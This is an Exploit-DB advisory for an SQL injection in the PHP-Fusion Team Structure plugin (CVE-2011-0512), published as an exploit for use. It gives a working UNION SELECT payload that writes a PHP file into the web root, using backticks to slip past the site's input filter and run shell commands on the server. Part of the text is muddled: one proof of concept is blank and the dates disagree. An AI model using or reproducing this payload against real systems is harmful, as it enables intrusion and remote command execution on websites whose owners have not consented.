PHP-Fusion Teams Structure Infusion Addon SQL Injection

EDB-ID: 16004 CVE: 2011-0512 OSVDB-ID: 70451...
Verified: Author: Saif Published: 2011-01-17
Download Exploit: Source Raw Download Vulnerable App:
# Exploit Title: PHP-fusion Team Structure Infusion (All versions) SQL
# Date: 16-1-2010
# Author: Saif El-Sherei
# Software Link:
# Version: PHP-fusion (7.01..03), TeamStructure Infusion(all versions)
# Tested on: Firefox 3.0.15, , IE 8


Plugin that allows the site to have a list of all teams / clubs (eg football
or hockey) with the playing staff, displaying the standings with the
position of command or a list of the best strikers of a championship.


the "team_id" variable is not probably sanitized before using in SQL query
in "team.php", the attack can be elevated as shown in second POC to bypass
PHP-Fusion's GET variable XSS filter. by using back-ticks instead of
brackets used in any php function  in that case shell_exec().


magic_quotes_gpc = Off

union select
union select '1','2','<?php $out=`id`;echo $out;
?>','4','5','6','7','8','9','10','11','12','13','14','15','16','17' into
outfile '/var/www/php-fusion/files/images/test.php


Saif El-Sherei